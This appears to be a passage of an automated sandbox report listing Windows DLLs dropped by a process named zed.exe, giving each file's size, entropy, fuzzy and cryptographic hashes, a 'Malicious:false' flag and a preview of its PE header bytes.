                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                            MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                            SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                            SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                            SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                                            Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                            MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                            SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                            SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                            SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                            MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                            SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                            SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                            SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22528
                                                                                                                                                                                                                                            Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                            MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                            SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                            SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                            SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):70656
                                                                                                                                                                                                                                            Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                            MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                            SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                            SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                            SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):770560
                                                                                                                                                                                                                                            Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                            MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                            SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                            SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                            SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26112
                                                                                                                                                                                                                                            Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                            MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                            SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                            SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                            SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):84992
                                                                                                                                                                                                                                            Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                            MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                            SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                            SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                            SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                            MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                            SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                            SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                            SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                            MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                            SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                            SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                            SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):119192
                                                                                                                                                                                                                                            Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                            MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                            SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                            SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                            SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49528
                                                                                                                                                                                                                                            Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                            MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                            SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                            SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                            SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):71448
                                                                                                                                                                                                                                            Entropy (8bit):6.263206909105092
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BoxWhy9EQkTpR1Pg9qgTILN/86wW1lI1Onl7SyPxN3:BiWhy3k1Ra9qgTILN/Lw8lI1OnlB
                                                                                                                                                                                                                                            MD5:CC0F232F2A8A359DEE29A573667E6D77
                                                                                                                                                                                                                                            SHA1:D3FFBF5606D9C77A0DE0B7456F7A5314F420B1F7
                                                                                                                                                                                                                                            SHA-256:7A5C88CE496BAFDF31A94AE6D70B017070703BC0A7DA1DFAE7C12B21BB61030D
                                                                                                                                                                                                                                            SHA-512:48484177BF55179607D66F5A5837A35CD586E8A9FB185DE8B10865AAB650B056A61D1DC96370C5EFC6955CCB4E34B31810F8E1C8F5F02D268F565A73B4FF5657
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...]e.......f.................. ..`.rdata..pO.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85272
                                                                                                                                                                                                                                            Entropy (8bit):6.591457260071925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+yhz79151BVo1vXfzIFnaR4bO1AsCn8Bsjk+tI1CVQ7Sy4x+R:Nhzx15evXkuxAB8BMk+tI1CVQF
                                                                                                                                                                                                                                            MD5:DD26ED92888DE9C57660A7AD631BB916
                                                                                                                                                                                                                                            SHA1:77D479D44D9E04F0A1355569332233459B69A154
                                                                                                                                                                                                                                            SHA-256:324268786921EC940CBD4B5E2F71DAFD08E578A12E373A715658527E5B211697
                                                                                                                                                                                                                                            SHA-512:D693367565005C1B87823E781DC5925146512182C8D8A3A2201E712C88DF1C0E66E65ECAEC9AF22037F0A8F8B3FB3F511EA47CFD5774651D71673FAB612D2897
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179712
                                                                                                                                                                                                                                            Entropy (8bit):6.180800197956408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:IULjhBCx8qImKrUltSfGzdMcbb9CF8OS7jkSTLkKWlgeml:IgCeqImzSfIMcNCvOkSTLLWWem
                                                                                                                                                                                                                                            MD5:FCB71CE882F99EC085D5875E1228BDC1
                                                                                                                                                                                                                                            SHA1:763D9AFA909C15FEA8E016D321F32856EC722094
                                                                                                                                                                                                                                            SHA-256:86F136553BA301C70E7BADA8416B77EB4A07F76CCB02F7D73C2999A38FA5FA5B
                                                                                                                                                                                                                                            SHA-512:4A0E98AB450453FD930EDC04F0F30976ABB9214B693DB4B6742D784247FB062C57FAFAFB51EB04B7B4230039AB3B07D2FFD3454D6E261811F34749F2E35F04D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......a..#%p.p%p.p%p.p,..p)p.p5.q'p.p5.zp!p.p5.q!p.p5.q-p.p5.q)p.pn..q!p.p6.q&p.p%p.p.p.pm..q!p.p,..p$p.pm..q$p.pm.xp$p.pm..q$p.pRich%p.p........................PE..d...W..f.........." ...).....B......`........................................0............`..........................................h..l....i..................T............ .......O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...p..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.138116508461042
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:cXw32spTVYgFoj6N2xE9sb7VRf/EiZBq5syCtYPU9BI1LP885:cgGEOgFoj68ksrf/Ejsa5
                                                                                                                                                                                                                                            MD5:C8AFA1EBB28828E1115C110313D2A810
                                                                                                                                                                                                                                            SHA1:1D0D28799A5DBE313B6F4DDFDB7986D2902FA97A
                                                                                                                                                                                                                                            SHA-256:8978972CF341CCD0EDF8435D63909A739DF7EF29EC7DD57ED5CAB64B342891F0
                                                                                                                                                                                                                                            SHA-512:4D9F41BD23B62600D1EB097D1578BA656B5E13FD2F31EF74202AA511111969BB8CFC2A8E903DE73BD6E63FADAA59B078714885B8C5B8ECC5C4128FF9D06C1E56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(............`_..............................................|.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257304
                                                                                                                                                                                                                                            Entropy (8bit):6.565090204799859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:3uQjqbJrTwvqM+eYx+lDJOAkl9qWM53pLW1AcfRRR6tlISgOg:3sTwvWeS+xJw4ln7g
                                                                                                                                                                                                                                            MD5:CEA3B419C7CA87140A157629C6DBD299
                                                                                                                                                                                                                                            SHA1:7DBFF775235B1937B150AE70302B3208833DC9BE
                                                                                                                                                                                                                                            SHA-256:95B9850E6FB335B235589DD1348E007507C6B28E332C9ABB111F2A0035C358E5
                                                                                                                                                                                                                                            SHA-512:6E3A6781C0F05BB5182073CCA1E69B6DF55F05FF7CDCEA394BACF50F88605E2241B7387F1D8BA9F40A96832D04F55EDB80003F0CF1E537A26F99408EE9312F5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...9........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.227566291152438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:/9gLpgE4Z27ARZWZnEmoAlI1OIH7SyT0xq:26RZeEmoAlI1OIHth
                                                                                                                                                                                                                                            MD5:D19CB5CA144AE1FD29B6395B0225CF40
                                                                                                                                                                                                                                            SHA1:5B9EC6E656261CE179DFCFD5C6A3CFE07C2DFEB4
                                                                                                                                                                                                                                            SHA-256:F95EC2562A3C70FB1A6E44D72F4223CE3C7A0F0038159D09DCE629F59591D5AA
                                                                                                                                                                                                                                            SHA-512:9AC3A8A4DBDB09BE3760E7CCB11269F82A47B24C03D10D289BCDDED9A43E57D3CD656F8D060D66B810382ECAC3A62F101F83EA626B58CD0B5A3CCA25B67B1519
                                                                                                                                                                                                                                            Malicious:false
